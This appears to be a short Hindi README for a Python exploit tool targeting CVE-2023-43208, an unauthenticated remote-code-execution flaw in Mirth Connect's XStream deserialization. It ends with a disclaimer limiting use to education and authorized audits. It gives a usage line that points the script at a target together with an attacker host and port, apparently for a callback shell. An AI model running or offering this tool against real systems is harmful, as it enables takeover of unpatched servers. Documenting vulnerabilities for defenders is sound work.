
CVE-2023-43208 Mirth Connect RCE (अप्रमाणित XStream) का Python कार्यान्वयन
यह शोषण Mirth Connect के XStream इंजन में एक गंभीर डिसीरियलाइज़ेशन कमज़ोरी का लाभ उठाता है। यह CVE-2023-37679 के अधूरे पैच से उत्पन्न होता है, और 4.4.1 से पहले के सभी संस्करणों में अप्रमाणित मनमाना कोड निष्पादन सक्षम करता है।
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
यह शोषण स्क्रिप्ट पूरी तरह से शैक्षणिक उद्देश्यों और अधिकृत सुरक्षा ऑडिटिंग के लिए है, जो रक्षकों को CVE-2023-43208 को कम करने में सहायता करे; अनधिकृत लक्ष्यों के विरुद्ध इस उपकरण का कोई भी उपयोग अवैध है और अंतिम उपयोगकर्ता की एकमात्र जिम्मेदारी है। लेखक इस सॉफ़्टवेयर को बिना किसी वारंटी के "जैसा है" प्रदान करता है, संभावित दुरुपयोग या क्षति के लिए सभी देयता को अस्वीकार करता है, और अनधिकृत गतिविधियों का समर्थन या प्रोत्साहन नहीं करता है। अपने जोखिम पर और केवल लागू कानूनों के अनुपालन में उपयोग करें।